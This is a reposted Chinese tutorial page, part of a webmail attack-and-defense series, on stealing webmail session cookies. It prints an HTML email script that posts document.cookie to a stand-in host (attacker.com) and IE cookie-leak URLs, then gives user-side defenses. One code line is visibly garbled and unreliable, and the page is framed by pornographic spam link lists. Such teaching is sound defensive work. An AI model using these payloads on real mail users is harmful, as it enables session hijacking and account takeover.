亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 服務器 > Mail服務器 > 正文

Webmail攻防實戰(6)_Mail服務器教程

2024-09-08 23:46:23
字體:
來源:轉載
供稿:網友
如果攻擊者能夠獲取用戶WebMail的cookie信息,那么就能很容易地侵入用戶的WebMail。攻擊者如何獲取用戶WebMail的cookie信息呢?如果攻擊者在用戶的電腦上安裝了木馬,或者能夠從網絡線路上對用戶進行嗅探偵聽,那么獲取cookie信息自然不成問題,不過這并不是我們討論問題的意義所在,因為都能夠這樣了,又何必大費周折去獲取cookie信息,直接獲取郵箱密碼就是了。

  如果WebMail系統存在跨站腳本執行漏洞,那么攻擊者就能欺騙用戶從而輕易地獲取cookie信息,雖然眾多網站存在此漏洞,但存在此漏洞的WebMail系統還很少見。

  含有惡性腳本程序的html郵件能使攻擊者獲取WebMail的cookie信息。Html郵件中的腳本程序先提取當前WebMail的cookie信息,然后把它賦值給某個表單元素,再將表單自動提交給攻擊者,攻擊者從而獲得cookie會話信息。下面是一段演示程序:

<body>
<form method="post" action="http://attacker.com/getcookie.cgi" name="myform">
<input name="session" type="hidden">
</form>

<script language="JavaScript">
var cookie=(document.cookie);
alert(cookie);//這一句用于顯示當前cookie信息,當然,攻擊者不會這樣做。
document.myform.session.value=cookie;
document.myform.submit();
</script>

  getcookie.cgi是放在攻擊者Web服務器上的一個cgi程序,用于獲取表單提交過來的cookie信息,并且做記錄或者通知攻擊者。當然,攻擊者會把html郵件、getcookie.cgi程序設計得更隱蔽,更具欺騙性,讓用戶難以察覺。

  通常,瀏覽器根據web服務器的域名來分別保存cookie信息,并且只會把cookie信息發送給同一域名的Web服務器。不過,瀏覽器的漏洞給攻擊者獲取不同域名的cookie信息創造了機會,Internet Explorer、Netscape和Mozilla等被廣泛使用的瀏覽器都存在過此類漏洞。下面是幾個Internet Explorer瀏覽器(針對IE5.0、IE5.5或ie6.0)泄漏cookie信息的例子:

  (1) Html語言中的object元素用于在當前頁面內嵌入外部對象,但Internet Explorer瀏覽器對object元素屬性的處理不當會導致任意域的cookie信息被泄漏,演示代碼如下:

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.,5000);
</script>

  (2) Internet Explorer瀏覽器錯誤處理“about”協議使得一個精心構造的URL請求可能會顯示或修改任意域的cookie信息,例如(以下代碼在同一行):

  about://www.anydomain.com/<script language=JavaScript>alert(document.cookie);</script>

  (3) Internet Explorer瀏覽器會誤把URL中“%20”(空格符的URL編碼)字符串之前的主機名當做cookie信息所在的域,并且發送出去。假設攻擊者有一個域名“attacker.com”,攻擊者把它做成泛域名解析,即把“*.attacker.com”指向攻擊者Web服務器所在的IP地址,“attacker.com”下的任何子域名或主機名都會被解析成這個IP地址,當用戶提交了類似下面這樣的URL后,瀏覽器就會把“anydomain.com”域名的cookie信息發送給攻擊者:

  http://anydomain.com%20.attacker.com/getcookie.cgi

  如果攻擊者要獲取WebMail的臨時型cookie信息,就會在html郵件中寫入相應的代碼,在用戶瀏覽郵件時,該代碼自動執行,使得攻擊者能夠獲取當前瀏覽器里的臨時cookie信息,也可以把用于獲取cookie信息的URL發送給用戶,誘騙用戶打開該URL,這樣攻擊者也能獲取臨時cookie信息。

  在攻擊者獲取cookie信息后,如果cookie信息里含有密碼等敏感信息,那么攻擊者就能很輕易地侵入用戶的郵箱,雖然hotmail等WebMail系統曾經發生過此類的情況,但cookie信息泄漏敏感信息的WebMail系統還很少見。

  攻擊者在獲取cookie信息之后,還要讓此cookie信息由瀏覽器來存取從而與WebMail系統建立會話,這樣才能侵入用戶的WebMail。如果是持久型cookie信息,攻擊者所要做的是把這個信息復制到自己的cookie文件中去,由瀏覽器存取該cookie信息從而與WebMail系統建立會話,不過臨時cookie信息存儲在內存中,并不容易讓瀏覽器存取。

  為了讓瀏覽器存取臨時cookie信息,攻擊者可以編輯內存中的cookie信息,或者修改公開源代碼的瀏覽器,讓瀏覽器能夠編輯cookie信息,不過這樣都不是很簡便的方法,簡便的方法是使用Achilles程序(packetstormsecurity.org網站有下載)。Achilles是一個http代理服務器,能夠載取瀏覽器和Web服務器間的http會話信息,并且在代理轉發數據之前可以編輯http會話以及臨時cookie信息。

  WebMail系統應該避免使用持久型cookie會話跟蹤,使攻擊者在cookie會話攻擊上不能輕易得逞。為了防止cookie會話攻擊,用戶可以采取如下措施以加強安全:

  (1) 設置瀏覽器的cookie安全級別,阻止所有cookie或者只接受某幾個域的cookie。

  (2) 使用cookie管理工具,增強系統cookie安全,如Cookie Pal、Burnt Cookies等。

  (3) 及時給瀏覽器打補丁,防止cookie信息泄漏。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
亚洲色图18p| 日韩a**中文字幕| 欧美中文字幕视频| 国产成人综合亚洲| 欧美俄罗斯性视频| 欧美电影免费观看大全| 97超碰国产精品女人人人爽| 国产精品精品视频| 青青草国产精品一区二区| 91久久久久久国产精品| 亚洲无限乱码一二三四麻| 亚洲一级黄色av| 成人黄色片在线| 8090成年在线看片午夜| 久久久国产一区二区| 久久精品国产96久久久香蕉| 国产日韩欧美自拍| 久久精品国产96久久久香蕉| 日本亚洲欧美成人| 97久久精品视频| 日韩中文字幕精品视频| 在线精品播放av| 亚洲精品有码在线| 国产一区二区日韩| 色噜噜亚洲精品中文字幕| 97国产一区二区精品久久呦| 欧美一级电影免费在线观看| 久久福利网址导航| 色综合久久88| 日韩福利伦理影院免费| 国产精品丝袜视频| 久久久久久久国产精品| 欧美亚洲国产日韩2020| 欧美一级淫片播放口| 欧美日韩一区二区在线| 国模私拍一区二区三区| 午夜精品三级视频福利| 91精品中文在线| 精品亚洲精品福利线在观看| 日韩电影免费观看在线观看| 最新中文字幕亚洲| 国产成人精品网站| 欧美国产中文字幕| 国产情人节一区| 91久久精品在线| 国产日韩在线视频| 欧美肥老太性生活视频| 国产精品专区一| 精品国内产的精品视频在线观看| 国产精品久久久久久久久男| 久久99热精品这里久久精品| 亚洲一区二区久久| 欧美午夜久久久| 国产精品白嫩美女在线观看| 97精品国产97久久久久久免费| 丝袜情趣国产精品| 国产精品主播视频| 亚洲国产精品系列| 欧美一级片久久久久久久| 国产精品专区一| 亚洲成人在线视频播放| 成人中文字幕在线观看| 国产日韩精品入口| 日韩高清欧美高清| 亚洲午夜久久久久久久| 久久夜色撩人精品| 国产午夜精品全部视频在线播放| 日韩综合视频在线观看| 国产精品久久久久久网站| 亚洲 日韩 国产第一| 日韩欧美在线视频观看| 成人欧美在线观看| 久久免费视频观看| 国内免费久久久久久久久久久| 日韩精品视频在线免费观看| 国产91在线播放精品91| 欧美久久精品午夜青青大伊人| 亚洲第一视频网站| 国产精品女主播视频| 在线观看成人黄色| 亚洲第一中文字幕| 97视频在线观看亚洲| 亚洲精品国产福利| 91欧美精品成人综合在线观看| 国自产精品手机在线观看视频| 国产精品美女免费看| 日韩av免费在线| 亚洲第一色中文字幕| 疯狂欧美牲乱大交777| 日韩在线视频网站| 国产精品久久久999| 久久久久久亚洲| 亚洲精品suv精品一区二区| 中文字幕久久久av一区| 色综合老司机第九色激情| 中文字幕亚洲一区二区三区五十路| 久久精品中文字幕一区| 欧美一区亚洲一区| 亚洲美女精品成人在线视频| 成人乱人伦精品视频在线观看| 亚洲一区二区三区香蕉| 久久亚洲影音av资源网| 91精品国产成人www| 中文字幕日韩精品在线观看| 国产精品久久久久久av福利| 欧美日韩免费在线| 九九精品在线观看| 日韩视频中文字幕| 日韩在线一区二区三区免费视频| 欧美精品久久久久久久免费观看| 国产成人久久久| 国产日本欧美一区二区三区在线| 国产亚洲xxx| 精品无人区乱码1区2区3区在线| 亚洲自拍欧美另类| 精品久久久一区二区| 日韩在线视频线视频免费网站| 色综合久久中文字幕综合网小说| 亚洲欧美国产一本综合首页| 精品香蕉一区二区三区| 日韩精品视频在线观看网址| 国产欧美日韩丝袜精品一区| 日韩成人av网址| 成人高清视频观看www| 搡老女人一区二区三区视频tv| 国产欧美精品一区二区三区介绍| 欧美激情精品久久久久久久变态| 亚洲第一网中文字幕| 亚洲色图日韩av| 亚洲电影免费观看高清| 亚洲激情电影中文字幕| 大量国产精品视频| 国产日韩中文在线| 免费91麻豆精品国产自产在线观看| 91成人性视频| 欧美高清在线视频观看不卡| 亚洲国产成人爱av在线播放| 伊人激情综合网| 国产在线观看精品一区二区三区| 精品国产福利在线| 国产综合色香蕉精品| 国产在线日韩在线| 欧美亚洲视频一区二区| 亚洲va久久久噜噜噜久久天堂| 日韩欧美主播在线| 欧美日韩亚洲高清| 中文字幕视频在线免费欧美日韩综合在线看| 成人做爽爽免费视频| 91亚洲午夜在线| 欧美性猛交xxxx乱大交蜜桃| 国产精品6699| 青青青国产精品一区二区| 国产精品第100页| 日韩中文字幕在线看| 亚洲情综合五月天| 日韩精品在线观看网站| 麻豆国产va免费精品高清在线| 久久精品99国产精品酒店日本| 啪一啪鲁一鲁2019在线视频| 久久久噜噜噜久久中文字免| 中文字幕精品久久| 欧美精品在线网站| 日韩暖暖在线视频| 久久视频这里只有精品|